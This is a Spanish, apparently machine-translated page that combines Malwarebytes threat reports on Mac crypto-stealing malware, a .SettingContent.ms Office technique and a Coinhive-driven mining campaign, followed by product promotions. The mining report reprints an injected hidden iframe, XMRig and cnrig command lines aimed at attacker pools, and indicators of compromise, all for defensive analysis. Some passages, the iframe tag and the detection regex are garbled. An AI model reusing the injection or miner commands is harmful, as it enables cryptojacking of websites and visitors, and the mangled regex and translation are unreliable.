La mayoría, aunque no todos, del malware de Mac en la actualidad está firmado criptográficamente con un certificado emitido por Apple. Estos certificados no son difíciles de obtener, ya que no cuestan más de $ 99 para obtener una cuenta de desarrollador con Apple. Lo bueno de esto es que una vez que el malware es detectado por Apple, el certificado puede ser revocado, matando al malware.

Sin embargo, hay algunos problemas con la forma en que macOS maneja la firma de código, y esto no se puede confiar. Como señaló Wardle en su análisis, el hecho de que este malware no esté firmado es irrelevante, ya que macOS no verifica la firma del código para un proceso que se ejecuta desde la línea de comando.

Se presentará más información sobre cómo la firma de códigos puede ser un problema en macOS en la conferencia Virus Bulletin de este año.

Objetivo: robo de criptomonedas

En general, es poco probable que este malware esté muy extendido, y probablemente sabrá si se ha infectado después de leer una descripción del malware.

Todavía no sabemos exactamente qué pueden querer hacer los hackers detrás del malware con el acceso a las máquinas infectadas, pero dado el hecho de que las comunidades mineras de criptomonedas fueron atacadas, es una apuesta segura que estaban interesados ​​en el robo de criptomonedas. .

Si cree que puede estar infectado, Malwarebytes eliminará el malware, incluidos los archivos dumpdummy que contienen su contraseña.

Si realiza tareas de seguridad o TI para una empresa, asegúrese de bloquear el acceso a la dirección IP a la que la secuencia de comandos intentará conectarse (185.243.115.230).

Pormalwarebytes

Nueva técnica sin macros para distribuir malware

Publicado: 2 de julio de 2018 por 
Última actualización: 3 de julio de 2018

Uno de los vectores de infección más comunes y efectivos, especialmente para empresas, es el uso de documentos maliciosos de Office. Solo este año, fuimos testigos de dos días cero para Flash y el motor de VBScript , que primero se incorporaron a los documentos de Office antes de obtener una adopción más amplia en los kits de exploits web.

Además de aprovechar vulnerabilidades de software, los atacantes abusan regularmente de las características normales de Office, como macros, o de otras más oscuras como  Dynamic Data Exchange (DDE) y, por supuesto, ataques de enlace e incrustación de objetos (OLE), que también pueden combinarse con exploits . Los administradores del sistema pueden endurecer los puntos finales mediante la desactivación de ciertas funciones en toda la empresa, por ejemplo, para frustrar ciertos esquemas de ingeniería social que intentan engañar a los usuarios para que habiliten una macro maliciosa. En versiones recientes de Office , Microsoft también está bloqueando la activación de objetos considerados de alto riesgo, según una lista de extensiones que se pueden personalizar a través de la Política de grupo.

Pero un descubrimiento reciente del investigador de seguridad Matt Nelson , muestra que se puede aprovechar otro vector de infección, uno que elude la configuración de protección actual e incluso la nueva  tecnología de Reducción de Superficie de Ataque de Microsoft  . Al incrustar un archivo de configuración especialmente diseñado en un documento de Office, un atacante puede engañar a un usuario para que ejecute código malicioso sin más advertencias o notificaciones.

El formato de archivo, específico para Windows 10 llamado .SettingContent.ms , es esencialmente código XML que se utiliza para crear accesos directos al Panel de control. Esta característica se puede abusar porque uno de sus elementos (DeepLink) permite ejecutar cualquier binario con parámetros. Todo lo que un atacante debe hacer es agregar su propio comando usando Powershell.exe o Cmd.exe. Y el resto es historia.

Un nuevo script encontrado por Nick Carr muestra un ataque en el que se invoca PowerShell para descargar y ejecutar REMCOS RAT ( informe VT ). Según Matt Nelson , quien descubrió esta nueva técnica, Microsoft no va a solucionarlo, al menos por el momento.

Probamos esta muestra en nuestro laboratorio y nos complace informar que los usuarios de Malwarebytes ya están protegidos:

Durante los últimos años, aunque ha habido poco desarrollo con kits de exploits web , ha habido mucha actividad con kits de explotación de documentos como Microsoft Word Intruder (MWI) o Threadkit . Estos kits de herramientas permiten a los atacantes crear señuelos e incrustar los exploits de su elección antes de lanzar phishing a sus víctimas o enviar el archivo a través de campañas de spam más grandes. Al mismo tiempo, parece que los ataques clásicos de ingeniería social no van a ir a ningún lado pronto y seguirán aprovechando el elemento humano.

Es importante que los usuarios finales y las empresas reconozcan que los documentos son un vector ideal de entrega de malware y requieren una protección y capacitación adecuadas para luchar contra ellos.

Pormalwarebytes

El enlace corto de Coinhive revela una operación minera más grande

Publicado: 3 de julio de 2018 por 
Última actualización: 2 de julio de 2018

Durante los últimos meses, la minería en el navegador ha seguido afectando a una gran cantidad de sitios web, y se basa predominantemente en la infame API de Coinhive. Documentamos varias campañas en este blog, en particular Drupalgeddon , donde los atacantes aprovechan las vulnerabilidades de los sistemas de administración de contenido (CMS) populares para comprometer sitios web y enviar cargas útiles tanto del lado del cliente como del servidor.

En las últimas semanas, nuestros rastreadores han catalogado varios cientos de sitios utilizando una variedad de CMS, todos ellos inyectados con el mismo código ofuscado que utiliza el enlace corto de Coinhive para realizar silenciosas unidades de disco duro . Al pivotar sobre este indicador de compromiso, pudimos identificar una infraestructura más grande que recibe tráfico de varios miles de sitios pirateados que actúan como puertas de entrada para redirigir el tráfico a un servidor central involucrado en la distribución de mineros de moneda estándar y web.

Figura 1: Operación minera impulsada por sitios comprometidos

Injerto de minero ofuscado

Como parte de nuestros rastreos regulares, buscamos redireccionamientos conocidos a sitios de interés y, últimamente, la mayoría se han relacionado con dominios de Coinhive. Detectamos cientos de dominios nuevos, todos los sitios web legítimos a los que se les inyectó una publicidad de código hexadecimal. Una vez decodificado, se muestra como un iframe invisible (1 × 1 píxel) a cnhv [.] Co / 3h2b2 . Creemos que es parte de la misma campaña que fue expuesta por la gente de Sucuri a fines de mayo.

<i frame src = "https: // cnhv [.] co / 3h2b2" width = "1" height = "1" align = "left"> </ i frame>

Figura 2: un sitio de WordPress inyectado con un iframe ofuscado que carga la API de Coinhive

El CNHV [.] Nombre de dominio co se utiliza para lo que llama Coinhive shortlinks , esencialmente, una forma de monetizar en hipervínculos haciendo navegadores de los visitantes a resolver un cierto número de valores hash antes de que lleguen a su sitio de destino. Al hacer clic en dicho enlace, verá una barra de progreso y en unos segundos, será redirigido. Los delincuentes están abusando de esta característica al cargar esos enlaces cortos como iframes ocultos con un recuento de hash irracionalmente alto.

Figura 3: Shortlink está gravando nuestra CPU al 100% 

En la Figura 3, donde hicimos visible el iframe cambiando sus dimensiones, para mostrar que, en lugar de esperar unos segundos antes de ser redirigido, los usuarios sin saberlo estarán explotando mientras permanezcan en la página. De hecho, aunque la configuración predeterminada de Coinhive está configurada en 1024 hashes, esta requiere 3,712,000 antes de cargar la URL de destino.

Backdoor inició la redirección

Al consultar urlscan.io , pudimos encontrar la misma clave de Coinhive activa el 7 de mayo a  través de un mecanismo de redirección diferente. Hay un patrón de URI específico que indica que los sitios pirateados se están aprovechando para realizar una redirección a un servidor a las 5.45.79 [.] 15 . Esto, a su vez, crea una redirección a través de otro URI diseñado donde uno de los parámetros es el sitio de referencia, que finalmente conduce al enlace corto de Coinhive que iniciará el minero web.

Figura 4: Se encontró el mismo enlace corto cargado desde un sitio web comprometido a través de un servidor intermediario

Varios sitios han sido inyectados con tanto la cnvh oculto método de co iframe, así como a través de puertas traseras [.]:

Figura 5: un sitio pirateado inyectado con el enlace corto de Coinhive y varias URL comprometidas

El patrón URI utilizado para las redirecciones se puede identificar mediante la siguiente expresión regular:

Figura 6: una expresión regular que muestra una coincidencia entre sitios comprometidos

Blackhat SEO y puertas

Si observamos nuevamente esos URI, podemos observar la presencia de ciertas palabras clave que parecen estar relacionadas con la Optimización de motores de búsqueda (SEO), por ejemplo:

cctvvietnam [.] com / 1hqg / wzdea.php? lrscye = mongodb - count - fields 
pixelbedlam.co [.] uk / 9ul8 / 6nfme.php? lrscye = relatividad - software - costo 
valam [.] in / f8wb / z8d6w. php? lrscye = tutoría - en - egipto 
stemat [.] pl / klwy / dzwfy.php? lrscye = vin - decodificador - mercedes 
whylab [.] nl / podd / 1hwnz.php? lrscye = gpon - inicio - puerta de enlace - explotar 
soho -dom [.] ru / el5p / ywuul.php? lrscye = bts - album - descargar -cremallera

Confirmamos que, de hecho, algunas búsquedas de Google o Bing nos mostraron resultados que incluían la lista de sitios comprometidos que actúan como «puertas», generalmente a un sistema de distribución de tráfico o redirector (5.45.79 [.] 15). En este caso, las entradas se utilizan para engañar a las personas para que descarguen mineros de moneda malintencionados en lugar del archivo que estaban buscando.

Figura 7: a pesar de las apariencias, este archivo no está 100% limpio

Observe cómo el servidor en 5.45.79 [.] 15 está realizando la redirección a otro sitio pirateado ( motoir [.] Com ), donde las palabras clave pasadas del URI se usan dinámicamente para crear lo que parece una única página y archivo de descarga.

Figura 8: Tráfico web que muestra la secuencia de redirección

Mineros de monedas malvados

Tras la ejecución, este ejecutable descomprimirá los siguientes tres binarios:

  1. winsystem.exe : el minero de XMRig
  2. clock.exe : archivo .bat envuelto en un EXE contiene comandos
  3. netflash.exe : un descargador muy simple, escrito en .NET.

La secuencia de comandos por lotes agrega persistencia al establecer una entrada de registro, elimina ciertos procesos (posibles mineros que ya se están ejecutando) y comienza a minar al iniciar:

winsystem.exe -B -a cryptonight -o 37.1.197 [.] 121: 80 -px -u% COMPUTERNAME% +500 --max-cpu-use = 30 --donate-level = 1 -k

Figura 9: script por lotes que revela el código de minería

Los binarios de descarga falsos se basan en el mismo código de un minero, como era de esperar, alojado en 5.45.79 [.] 15 / xxxphoto.exe . Utilizando VirusTotal Intelligence, pudimos ampliar esta infraestructura e identificar otro coin miner, que es un archivo ELF esta vez, basado en esta biblioteca cnrig , alojado en: 5.45.79 [.] 15 / monero / cnrig .

Figura 10: Gráfico que muestra un minero ELF y Win32 alojado en el mismo servidor

Un comentario dejado en esta  página del informe VirusTotal indica que este minero fue encontrado en un servidor infectado y sacado de una puerta trasera PHP llamada  zz1.php . Buscando ese nombre de archivo, ubicamos un posible candidato cargado en un sitio público. Decodificando las cadenas codificadas en Base64, podemos afirmar con mayor confianza que este es el archivo PHP malicioso utilizado por los atacantes para descargar el minador de monedas de Linux desde  5.45.79 [.] 15 / monero / cnrig :

Figura 11: código PHP cargado en sitios comprometidos responsables de la descarga de mineros de ELF

Una vez que ha recuperado el binario ELF, lo ejecuta usando el siguiente comando para comenzar a extraer:

./cnrig -o 5.61.46 [.] 146: 80 - nivel de donación = 1> / dev / null 2> & 1

Proxies

Debido a que los mineros se están conectando a grupos privados (y probablemente a través de un proxy) sin utilizar una dirección de billetera, no podemos evaluar cuánto dinero han generado los perpetradores con este esquema.

De hecho, el servidor en 5.45.79 [.] 15 también tiene su propio ProxyPanel :

Figura 12: un proxy basado en  xmrig-proxy

La versión de XMRig del minero tenía una página pública de estadísticas que indicaba que había cerca de 500 máquinas infectadas que habían participado en la actividad minera. Para la versión CNRig, no pudimos encontrar ninguna estadística, aunque la cantidad de servidores pirateados fue mucho mayor.

Un número creciente de sitios

El interés que rodea a las criptomonedas ha cambiado drásticamente el panorama de malware con los delincuentes con la esperanza de obtener una parte de la acción. Como tal, cada vez más sitios web se ven comprometidos tanto en el lado del cliente como en el del servidor para distribuir y ejecutar mineros.

En esta campaña, vemos una infraestructura utilizada para impulsar a un minero de XMRig a los usuarios engañándolos para que descarguen los archivos que estaban buscando en línea. Mientras tanto, los servidores pirateados tienen instrucciones de descargar y ejecutar un minero Linux, generando ganancias para los perpetradores pero incurriendo en costos para sus propietarios. Finalmente, parece apropiado ver un abuso de los enlaces cortos de Coinhive para realizar minería en el navegador.

Malwarebytes bloquea la extracción maliciosa, ya sea desencadenada por malware o cargada a través de sitios web comprometidos.

Gracias a @DynamicAnalysis por compartir información adicional.

Indicadores de compromiso

Cadena para la inyección de cnvh [.] Co ofuscado

vhisduhvuhiusdhfbjhewvhisdhbybguyebrrfsd

Coinhive shortlink

cnhv [.] co / 3h2b2

Clave del sitio de Coinhive

Dkpy5v4CBgwZqzPRosdHKDB7DQsc1Sav

Regex para la redirección de sitios comprometidos

\ / (\ w {4} | \ w {8}) \ / (\ w {5} | \ w {9}) \. php \? ([az] {6} | [az] {3}) = [\ w] {1,25} - [\ w] {1,25}

Servidor de redirección

5.45.79 [.] 15

Cuentagotas de minero de Windows

5.45.79 [.] 15 / xxxphoto.exe
38f55239519523638dc2b3958f5e9951a6b04f813336927a4f7de717518e5b44

Minero de Linux

5.45.79 [.] 15 / monero / cnrig
c890d18fe3753a9ea4d026fc713247a9b83070b6fe40539779327501916be031
Pormalwarebytes

SOLICITAR VERSION DE EVALUACION DE MALWAREBYTES ENDPOINT PROTECTION

Pormalwarebytes

Malwarebytes RegASSASSIN

Elimina las claves de registro creadas por malware

DESCARGAR

RegASSASSIN puede eliminar cualquier clave o valor del registro de su ordenador

En muchos casos, el malware deposita claves de registro parasitarias en el registro del sistema, lo que pone su ordenador en riesgo de infección y corrupción. Estas claves eran muy difíciles de eliminar… hasta hoy.

RegASSASSIN elimina las claves del registro creadas por el malware en dos sencillos pasos: basta con restablecer los permisos y eliminar la clave. Esta aplicación potente y portátil le hará olvidar a las claves del registro difíciles de eliminar.

Aviso: Extreme la precaución, ya que el borrado de claves críticas del registro puede causar errores del sistema.

Uso

  • Descargue RegASSASSIN del enlace anterior.
  • Haga doble clic en RegASSASSIN.exe
  • Introduzca la clave del registro que desee eliminar o restablecer y haga clic en Borrar
Pormalwarebytes

Malwarebytes StartUpLITE

StartUpLITE acelera el arranque de Windows

DESCARGAR

A nadie le gusta esperar a que su equipo arranque: es tan aburrido como sentarse a mirar la pared (o un partido de golf). En Malwarebytes sabemos que tiene otras cosas que hacer y sitios web que visitar, así que hemos creado una forma ligera y manejable de acelerar el arranque.

StartUpLITE ofrece una manera segura, fácil y eficaz de eliminar aquellas aplicaciones innecesarias que se inician al encender el ordenador.

Desactivando o eliminando las entradas innecesarias, StartUpLITE puede reducir enormemente el tiempo de inicio con solo unos clics del ratón. Deje de esperar y empiece a disfrutar del ordenador.

Uso

  • Solo tiene que descargar StartUpLITE desde el enlace que aparece arriba y guardarlo en una ubicación adecuada
  • Haga doble clic en StartUpLITE.exe
  • Seleccione aquellas opciones que desea ejecutar y seleccione Continuar
Pormalwarebytes

Breach Remediation Beta en nube

Estamos encantados de anunciar la beta pública de nuestra próxima plataforma basada en la nube para la respuesta a incidentes para las empresas.

Malwarebytes respuesta a incidentes incorpora las siguientes características clave de alto nivel:

  • consola de administración basada en la nube
  • vistas del tablero de instrumentos
  • Punto final y de gestión de activos
  • La administración de políticas y de grupo
  • Los análisis programados
  • descubrimiento y remediación Malware

Esta es una gran oportunidad para que usted pueda obtener una visión  de nuestra nueva respuesta de incidentes Malwarebytes basado en nuestra nueva plataforma Cloud.

Estamos en busca de probadores beta que pueden desplegar  Malwarebytes respuesta a incidentes en un entorno empresarial de por lo menos 5 puntos finales en  máquinas Windows. Si desea convertirse en un probador beta vamos a configurarle  una cuenta e instrucciones sobre cómo empezar. Para inscribirse sólo tiene que enviar un correo electrónico a info@antimalwares.es